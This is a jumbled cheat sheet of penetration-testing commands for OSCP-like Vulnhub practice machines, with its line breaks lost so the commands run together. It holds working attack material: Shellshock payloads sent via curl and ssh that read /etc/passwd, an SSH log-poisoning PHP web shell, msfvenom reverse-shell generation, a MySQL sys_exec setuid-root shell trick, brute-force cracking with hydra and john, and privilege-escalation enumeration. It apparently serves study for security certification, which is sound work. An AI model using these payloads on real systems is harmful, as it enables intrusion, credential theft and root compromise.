From 0SCP-like Vulnhub boxes
- https://www.vulnhub.com/
Commands
service smbd restart && dhclient eth0tcpdump -nnttttAr wireless.captcpdump -nnttttAi loaircrack-ng -w wordlist.txt wireless.capnetstat -antpnmap -p- -A -T5 {IP}dirb {IP} -u {usr}:{passwd}zsteg -a suspicious.pngjohn --show --format=Raw-MD5 hashfilessh admin@{IP} -p6464 -t "bash --noprofile"- https://ghidra-sre.org/
ssh-keygensteghide extract -sf file.jpgls | sed s/\.jpg//hydra -L wordlist -P wordlist {IP} sshrsmangler -m 6 -x 8 -r -d -e -i --punctuation -y -a -C --pna --nb --space --allow-duplicates -f wordlistOrigin -o newwordlisthistorymsf> use windows/ftp/ftpshell_cli_bofmsf> session -i 1meterpreter> upload accesschk64.exemeterpreter> shell.\accesschk64.exe /accepteula -uwcqv.\accesschk64.exe -uwqs Users c:\*.*sc qc {service_name}icacls "{service_path}"tasklist /SVCmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={IP} LPORT={port} -f exe -o file.exemove a.exe b.exeshutdown /rmeterpreter> run post/windows/manage/migrateenum4linux {targetIP}smbclient //{target_IP}/anonymoussmbclient //{target_IP}/helios -U helioswpscan --url {url} --api-token {token} --enumerate p,ucd /var/mail/usertelnet {IP} 25find / -uid 0 -perm -4000 -type f 2>/dev/nulljohn shadowfile --wordlist=/usr/share/wordlists/rockyou.txt./LinEnum.shssh -L 8080:localhost:8080 aelus@192.168.56.156msf> set RHOSTS localhostssh tunnelmsf> set LHOST eth1ssh tunnelmsf> sessions -lmsf> sessions -i 1python -c 'import pty; pty'sudo mysql -e '\! /bin/sh'curl -H "user-agent: () {:;}; echo; echo; /bin/bash -c cat '/etc/passwd' " http://{IP}/cgi-bin/underworldcurl -A () " {echo h;}; echo; bin/ls -l " http://{IP}/cgi-bin/test.cgiscp pspy32 hades@{IP}:/home/hadesssh '<?php system($_GET["cmd"]); ?>'@{IP}to interfere /var/log/authnetstat -antupss -tulpnsocat tcp-listen:9999,reuseaddr,fork tcp:localhost:8080search python flask jsonpickle exploit$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "{password_hash}")ldapsearch -h {host} -p {port} -b "dc=symfonos,dc=local" -w '{password}' -D "cn=admin,dc=symfonos,dc=locol"apt-get install hexchatmsf> use auxiliary/scanner/smtp/smtp_enumfind /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/nullfind /etc/ -maxdepth 1 -name *.conf -type f 2>/dev/null | xargs ls -alupdate-alternatives --config javalsb_release -auname -ahttps://github.com/21y4d/nmapAutomator/blob/master/nmapAutomator.shfind / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/nullcrackstaion.netcrack hashcat /etc/sudoersecho os.system('/bin/bash')grep -Hn textpattern * 2>/dev/nullps aux | grep mysqlmysql> use mysql,mysql> select * from mysql.func;mysql> select sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh')hydra -L usernames -p {password} {IP} ssh -t1git clone https://github.com/lanjelot/patator.gitlike hydrafcrackzip -u -D -p wordlist file.zipssh -vv noob@{IP} -i noobkeyssh noob@{IP} -i noobkey '() { :;}; echo SHELLSOCK'ssh-keygen -b 2048 -t rsa./ssh/authorized_keysfind / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null./program $(python3 -c 'print("a"*1000)')locate pattern_createlocate pattern_offsetmsfvenom --platform linux -p linux/x86/exec -f py CMD="/bin/sh" -b '\x00\x0a\x0d' -a x86 -e x86/shikata_ga_naidotdotpwn -m http -h {IP} -f config.php